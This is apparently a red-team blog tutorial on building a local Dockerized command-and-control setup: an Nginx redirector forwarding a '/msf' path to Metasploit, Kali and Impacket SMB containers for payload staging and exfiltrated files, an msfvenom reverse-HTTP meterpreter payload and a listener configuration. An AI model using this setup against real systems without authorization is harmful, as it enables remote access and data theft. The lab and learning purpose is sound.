A N00b’s Perspective on Red Teaming: Dockerizing your Red Team Infrastructure

Christian Sanchez
16 min read · Aug 26, 2021


I’ve learned a lot since I started shadowing some talented red teamers. During that time, I learned how to build, rebuild, and tear down an infrastructure quickly with the use of Docker. Once you have your initial build configured and set up, Docker lets you automate the entire build process with one or two commands. This is a really important part of red teaming, especially when your command-and-control (C2) infrastructure or your proxy server gets compromised, detected, or blocked. You need to be able to spin up and tear down all of the key components as quickly as possible.

In this post, I will go over my automated Docker build and explain my thought process. I still have a lot to learn about Docker, but this blog post will cover some of the basics for using Docker as part of a red team engagement.

Docker versus virtual machines

Docker is a virtualization tool. However, it is not like VirtualBox, Proxmox, Hyper-V, or VMware Workstation. It’s a little bit more complex than that. It works at the OS level but shares the same hardware resources as the host. With a virtual machine (VM), all of the hardware is isolated and the VM runs as if it is its own separate computer. Docker uses a daemon that talks to the OS kernel and uses Linux namespaces to create containers. Within those containers, Docker can spin up a minimal “virtualized” Linux environment. Because containers talk directly to the host’s kernel, they do very little to isolate themselves from the host and share the exact same resources as it. A virtual machine does the opposite, isolating itself as much as possible from the host’s kernel and hardware.

So, are virtual machines safer or more secure? The short answer is yes and no. The big difference between Docker and a virtual machine is portability. You can spin up a container within a matter of seconds with one command, which makes it easier and faster to spin up applications. So, if you separate everything correctly, with the right permissions, there shouldn’t be much of an issue. Remember, you need to be able to tear down and rebuild your infrastructure quickly, so you wouldn’t want to run a bunch of services on a single container anyway. However, if there is an exploit for the application running within your Docker container, or you’re running a vulnerable version of Docker…well…feels bad, bro…the attackers are most likely not only pwning your application, they’re also pwning the host.

Setting up Docker

Now that I have provided a brief description of what Docker is and what it can do, let’s try building a local red team infrastructure. First things first, I need to install the Docker engine. There are numerous ways to install it. On Ubuntu, you can install it with “apt install docker.io”. On macOS, there is a client you can download directly from Docker’s site. There is also the open-source version of Docker, Docker CE, which runs pretty much the same; you won’t really notice any relevant differences. To install it, just follow the directions on Docker’s site, here. As for Windows, you can download a binary version of the engine as well.
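For example, on Ubuntu the whole thing can look something like this (a rough sketch; package names and the post-install group step can vary between distributions and Docker versions):

# install the Docker engine and docker-compose from Ubuntu's repositories
sudo apt update
sudo apt install -y docker.io docker-compose

# optional: allow your user to run docker without sudo (log out and back in afterwards)
sudo usermod -aG docker $USER

# quick sanity check
docker run --rm hello-world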

Understanding the local infrastructure

Docker can spin up a virtual host and automate the commands you want to execute, so you can install the applications you need rather quickly. If you want to spin up multiple applications, you can automate this process with a combination of Dockerfiles and a docker-compose file. I will explain how Docker uses the two files in the next section.

The following diagram shows the build that I will be creating and walking through.

Our host will run five Docker containers, with an Nginx container being the only one that is externally accessible. This container will act as a proxy to our other containers, forwarding traffic based on the URI path. For example, if I wanted our Nginx server to forward traffic to our C2, in this case a container running Metasploit, I would use http://<ourservermachine>:<port>/msf. This will be configured by creating a custom nginx.conf file.

Proxy it up!

Let’s start by creating the files I need, starting with the nginx.conf file. The configuration file should specify the port our web server will be listening on and a URI. The URI location tells the web server that if a visitor hits that page/URI, the traffic should be forwarded to our C2 listener, which in this case is another Docker container. That code should look like this:

worker_processes 1;

events { worker_connections 1024; }

http {
    sendfile on;

    server {
        listen 80;

        location /msf {

        }
    }
}

The worker_processes directive should be set to the number of cores I want to utilize for the web server. One core should be okay because I don’t expect a lot of traffic hitting that URI. More information about the different settings you can use in your configuration file can be found here: http://nginx.org/en/docs/ngx_core_module.html#worker_processes.

The “events” context tells the web server how to handle connections. In this case, I am allowing 1024 connections to be handled by a single worker process. Enabling the sendfile directive speeds up file transfers by letting the kernel copy file data directly to the socket instead of passing it through user space. The Nginx instance will create an HTTP server listening on port 80. A URI location will be created, in this case “/msf”. When creating our Metasploit payload later, this is the URI we will be using to direct our traffic to the C2 via the proxy server.

Now that all the basic functions for the web server are set up, the next thing is to set up the proxy forwarding to the Metasploit container.

worker_processes 1;

events { worker_connections 1024; }

http {
    sendfile on;

    server {
        listen 80;

        location /msf {
            proxy_pass http://msf:80;
            proxy_redirect off;
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            proxy_set_header X-Forwarded-Host $server_name;
        }
    }
}

The “proxy_pass” directive will pass any traffic that hits the “/msf” URI to our C2 container, which is also listening on port 80. The container will also be called “msf” (I will explain that once I start creating our docker-compose file). Since the traffic is not really being forwarded to another host, but rather to a local container, “proxy_redirect” can be disabled. As for the headers, we are going to add some additional information by setting “X-Real-IP” to “$remote_addr”, “X-Forwarded-For” to “$proxy_add_x_forwarded_for”, and “X-Forwarded-Host” to “$server_name”.

A GET request to the Nginx instance should look something like this:

GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: evilwebsite[.]com
X-Real-IP: victim-ip-here
X-Forwarded-Host: evilwebsite
User-Agent: Firefox

Normally, I would redirect the requests to a reputation host, which is a legitimate website I want to show visitors when they browse to the host.

Think of a reputation host like a speakeasy back during Prohibition times. There is a legitimate business out front, like a grocery store, a barber shop, etc. However, if you knock on a specific door within that business and say a “magic word”, someone will grant you access to something else underneath it all. If I set the headers like this in a real red team engagement, I would get got! But for this exercise, we are setting up our infrastructure locally, so having Nginx set these headers will let us see how traffic is being sent and will be useful for troubleshooting. I will explain how to set all of this up using real hosts within a Digital Ocean environment in my next blog post.
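Just to illustrate the idea, a reputation host would typically be wired in as a catch-all location in the nginx.conf, so anything that isn’t the “magic word” URI gets sent to a legitimate-looking site. A rough sketch (the domain below is purely a placeholder, not part of this build):

location / {
    # everything that doesn't match our "magic word" URIs goes to the reputation host
    proxy_pass https://www.example.com/;
    proxy_set_header Host www.example.com;
}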

Now that we have our nginx.conf set up, let’s change gears and set up the docker-compose file.

Docker-compose and Dockerfile

With docker-compose I can create multiple containers, each running a different application. A docker-compose file provides Docker with a set of instructions to perform during the build process. Let’s say that I want Docker to open ports, share a specific file, create a shared folder/volume, and install multiple programs. Now let’s say I want to perform the same actions on multiple containers. Or even better, what if I want to install different services on each container, open different ports, and use a different OS for each instance? A docker-compose file makes this possible and automates that process for us.

In the following docker-compose file, I created five different containers. One container will run our proxy using Nginx; I will call that container “proxy”. The second will use a Metasploit Framework image; this one I will call “msf”. The third container, called “kali”, will be running a Kali Linux image. I created an extra container, named “files”, to share files between all the containers quickly. The fifth and final container will be running Impacket for quick file sharing via SMB. This could be used for transferring files onto a victim host or uploading exfil data.

version: "3.3"
services:
  proxy:
    image: nginx:latest
    container_name: proxy
    volumes:
      - ./nginx.conf:/etc/nginx/nginx.conf:ro
    ports:
      - 0.0.0.0:80:80/tcp
  msf:
    image: metasploitframework/metasploit-framework:latest
    container_name: msf
    tty: true
    stdin_open: true
    volumes:
      - ./scratch:/tmp/
      - share:/share/
  kali:
    build: ./images/kali/
    volumes:
      - ./scratch/:/scratch
    tty: true
    stdin_open: true
  files:
    container_name: files
    image: python:3
    working_dir: /share/
    volumes:
      - share:/share/
  impacket:
    container_name: impacket
    build: ./images/impacket
    working_dir: /share
    command: smbserver.py -smb2support share /share
    ports:
      - 0.0.0.0:445:445/tcp
    volumes:
      - share:/share
volumes:
  share: {}

Since I will be relying on a proxy to forward our traffic to Metasploit, I just need port 80 to be open on our Nginx container. This means when I set up the C2 listener, it needs to be listening on the same port. However, I will get to that later.

As I mentioned earlier, Docker uses our host’s resources, including hard drive space, to run a lightweight Linux environment. I can take files and folders on our host machine and share them with a container. This is done using Docker’s built-in volume feature. For this build, I will create a folder called “scratch” on our host machine and mount it inside the containers; the folder will be shared with the kali and msf containers.
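One assumption here is that the “scratch” folder already exists on the host; if you are following along, create it inside the main build folder before starting the build:

mkdir -p scratch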

The Impacket container will be used specifically to share files back and forth with external hosts. It will allow us to quickly serve a binary to a target or collect files I exfil from a host. There is also the “files” container, which pulls a Python 3 image, has its working directory set to “/share”, and is referenced in the nginx.conf. At the bottom of the docker-compose file you can see I am creating a named volume called “share”, which will be mounted in all of these containers. Once the Impacket image has been built, the docker-compose file will instruct Docker to run a command that automatically starts the SMB server.

A Dockerfile gives me the ability to automate a series of commands to execute within the container at build time, which lets me make the builds a bit more complex. For example, I can pull the latest Kali Linux image, install the top 10 Kali tools using apt, and then install additional programs that might be useful during an engagement. Furthermore, I can execute pretty much any shell command, allowing me to perform actions like running scripts, adding users, creating folders, etc.

The Dockerfile for our Impacket image will pull the latest Python image (a barebones version of Linux running Python) and install Impacket using pip.

FROM python:latest

RUN set -x \
    && pip install impacket \
    && echo '[+] Done'

CMD ["/bin/bash"]

At this point, I also need to update our proxy’s nginx.conf. I will name the URI path “/share”. The updated nginx.conf should now look like this:

worker_processes 1;

events { worker_connections 1024; }

http {
    sendfile on;

    server {
        listen 80;

        location /msf {
            proxy_pass http://msf:80/;
            proxy_redirect off;
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            proxy_set_header X-Forwarded-Host $server_name;
        }

        location /share {
            proxy_pass http://files:80/;
            proxy_redirect off;
        }
    }
}

The following Dockerfile shows the shell commands I want to execute in the Kali Docker container at build time. It will tell Docker to pull the latest Kali image from Docker’s official repository. Once downloaded, it will run apt update and then install several programs.

FROM kalilinux/kali-rolling:latest

RUN set -x \
    && echo '[+] Updating Kali' \
    && DEBIAN_FRONTEND='noninteractive' apt update -qy \
    && echo '[+] Done'

RUN set -x \
    && echo '[+] Installing Tools' \
    && DEBIAN_FRONTEND='noninteractive' apt install -qy \
        kali-tools-top10 \
        openssh-server \
        tmux \
        dirbuster \
        gobuster \
        python3-pip \
    && echo '[+] Done'

CMD ["/bin/bash"]

Now let’s save both Dockerfiles under a folder called “images” within our main build folder. At this point our build folder structure should look something like this:

├── docker-compose.yml
├── docker_build
├── images/
│ ├── impacket/
│ │ └── Dockerfile
│ └── kali/
│ └── Dockerfile
├── nginx.conf
└── scratch/

I have everything I need for a basic infrastructure. This build allows me to transfer and share files, creates a C2 server, and sets up a proxy. Now to test it out!

Testing out the infrastructure

I can start the build process by running docker-compose up -d --build. The -d flag will run the containers in “detached” mode, which keeps them running in the background. If I want to shut down the containers, I can do so by simply executing the docker-compose down -v command. The -v flag after down will remove any volumes shared between our host and the containers.
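For reference, the two commands side by side:

# build (or rebuild) the images and start all containers in the background
docker-compose up -d --build

# tear everything down, including the shared volumes
docker-compose down -v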

Now the build process takes a couple of minutes, but at this point I can sip some coffee and wait.

Docker build process
docker-compose has finished the build process. The containers are up and running.

Once everything has completed, I can see which Docker containers are running on our host by executing the command docker ps.

Executing “docker ps” will show you all of the containers running on the host

Great! It looks like all my containers are up and running. If I browse to our IP, I should see an Nginx message.

A 404 shows that the webserver is up

I got a 404 error from Nginx. This means our web server is working. This index page is where I would normally have the proxy forward my traffic to a reputation host. However, I will not be setting up a reputation host in this example.

Now I need to test our proxy and make sure that our traffic is being forwarded to our C2 correctly. But first, I need to create an msfvenom payload to test with.

I will be creating a stageless python/meterpreter_reverse_http payload pointing at my main host’s IP. The payload, once executed, will reach out to our Docker container running Nginx. The Nginx instance will be listening and waiting for a request to be made to the “/msf” URI path. Once a request has been made to that URI, it will forward the traffic to our C2 container, providing us a shell.

I can create the payload within the container itself. You can get a shell on the msf container by executing docker exec -it msf /bin/bash. The -it flags provide us an interactive TTY shell using bash.

Accessing the msf container.

This is a great opportunity to see if files are being shared across all containers. Let’s back out of the Metasploit container by pressing Ctrl+P then Ctrl+Q. This key combination detaches from the container and leaves it running in the background without tearing it down.

Now let’s jump into our Kali Linux container to check if our files are being shared. I will create a payload within the Kali instance, save it in the “/share” folder, then log into our “files” container to see if it shows up there as well.

I can attach to our Kali container by running docker attach against its container name. In our “files” container, the current running process is the Python server, so if I attached to that container, I would be dropped into a process where I can’t really do much unless I stop the server. To get an interactive TTY shell instead, I can execute the same kind of command I ran earlier when I entered the Metasploit container: docker exec -it files /bin/bash.

Creating a stageless python meterpreter payload using msfvenom.
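The exact command isn’t shown in text here, but a stageless payload along these lines should behave the same way (the output path and file name are just examples; LURI keeps the payload lined up with the /msf path the proxy forwards):

msfvenom -p python/meterpreter_reverse_http LHOST=<hostip> LPORT=80 LURI=/msf -f raw -o /share/payload.py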

Great! Anything I create in one container will be shared with all other containers except the proxy. I will now test to see if the Impacket SMB server is working. I can check this quickly from our Kali instance by executing smbclient -L <hostip> --no-pass, which will list all the shares offered by the remote host.

Testing SMB using smbclient to list out the share directories

To connect to and access the share, we can execute smbclient \\\\<hostip>\\share.

At this point, everything is working great. Now to test the C2!

Getting Shell

Now that I have created the payload and tested file sharing across the infrastructure, let’s attempt to get a callback to our C2 container using the payload I created earlier.

Let’s set up the listener by attaching to our msf container using the docker attach command. This will bring us into the Metasploit console.

For the listener, I will use a multi/handler and will set the payload to python/meterpreter_reverse_http. Remember, I used a stageless payload, so the full payload will be executed on the victim host. The listener will listen on all interfaces, or 0.0.0.0. Using 0.0.0.0 avoids any problems we might run into by using a loopback address or our host’s IP or hostname. Since the proxy will forward anything that hits the URI path /msf on port 80, we should mirror those settings here as well by setting LURI and LPORT.
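Spelled out, the handler setup boils down to a few msfconsole commands, roughly like this (the LURI has to match the /msf path configured on the proxy):

use exploit/multi/handler
set payload python/meterpreter_reverse_http
set LHOST 0.0.0.0
set LPORT 80
set LURI /msf
run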

Setting up a listener in msfconsole

Now that the listener is up and running, let’s run the payload from our Kali instance to test it.

The payload failed to call back to the C2.

Well…it looks like executing the payload didn’t do anything. Let’s do some troubleshooting to figure out where exactly things are failing.

Troubleshooting

After not seeing any activity on my C2 server, I need to test communication between each component to figure out where the traffic fails to be forwarded, starting from the “victim” machine to the proxy. The first question that runs through my mind is, “does my payload talk to the proxy server?” If not, “is my proxy server up, or is there something wrong with my payload?” If my traffic is hitting my proxy server, “is my proxy server forwarding traffic to my C2?”

Let’s check the communication from our test “victim” host to the proxy server by running a basic curl command with the verbose flag.
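The check itself is a one-liner from the “victim” container:

curl -v http://<hostip>:80/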

Testing the connection between victim and proxy server.

It looks like the server is up and our “victim” host can talk to it just fine. This was verified by sending a request to http://<hostip>:80/. The fact that the server responds with a 404 is good; it shows that the server is accepting requests, even though it can’t find the page.

Now, let’s check the server logs to see what could be happening at the proxy. If you log in to the “proxy” container and look at the Nginx log folder under /var/log/nginx/, you will notice that the files are symbolically linked to /dev/stdout and /dev/stderr. This means the logs are pushed directly to Docker’s standard output and standard error streams.

The logs within the Nginx container are forwarded directly to Docker’s logs.

This means I can see the application’s logs with a single Docker command: docker logs <container>. Now let’s run the curl command again, but this time sending a GET request to the URI path that should be forwarded to our C2 server. Then I can check the logs to pinpoint what’s happening with the traffic between the proxy and the C2 container.
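In practice that’s just two commands: repeat the curl against the /msf path, then pull the proxy container’s logs:

curl -v http://<hostip>:80/msf
docker logs proxy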

Let’s check the response from the curl command, this time to http://<hostip>:80/msf. Based on the proxy’s response, it seems like the proxy doesn’t know how to forward the traffic, giving us a “Bad Gateway” error. Also, if you look back at the screenshot from when I first attempted to run the payload, you can see that Metasploit wasn’t receiving the traffic at all, which means the traffic is stopping at the proxy.

Traffic is not being forwarded to the MSF container.

Looking at the logs, it appears the connection is cut when the proxy attempts to send the traffic to the upstream. This confirms that the issue is at the proxy.

The logs show that the connection is being closed prematurely.

This means I need to look back at our nginx.conf; there seems to be an issue there.

After analyzing the configuration file, I noticed a very small issue with the “proxy_pass” directive.

location /msf {
    proxy_pass http://msf:80/;
    proxy_redirect off;
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header X-Forwarded-Host $server_name;
}

Looking at the “proxy_pass” directive, you can see that the URI part is just “/”. When proxy_pass includes a URI, Nginx replaces the matched location prefix with it, so a GET request that hits our proxy at /msf gets forwarded to the upstream host, our Metasploit container, as a request for http://msf:80/ instead of http://msf:80/msf. Our exploit handler is only listening on the /msf path, so there is nothing at the root and the connection gets cut.

The updated and correct configuration should look like this:

server {
    listen 80;

    location /msf {
        proxy_pass http://msf:80/msf;
        proxy_redirect off;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Host $server_name;
    }
}
Now I have to apply the changes. Let’s start by tearing down the containers by executing the docker-compose down -v command. To be safe, let’s rebuild the containers by providing the --build argument to docker-compose; this will give us a fresh build. The full command is docker-compose up -d --build.

Once the containers are back up, I will need to recreate the payload and set up the listener again. I will then attempt to execute the payload one more time.

Getting shell…again

Getting shell…finally!

Finally! I got my infrastructure working and I can forward traffic to my C2 server! I have successfully created a simple local infrastructure. In my next post, I will set up a similar infrastructure, but I will automate it using Terraform and create the hosts in Digital Ocean. This will let us test our payloads over the internet, giving the exercise more of a real-operation feel. Nonetheless, I hope you enjoyed learning about Docker and setting up your own local C2 infrastructure!
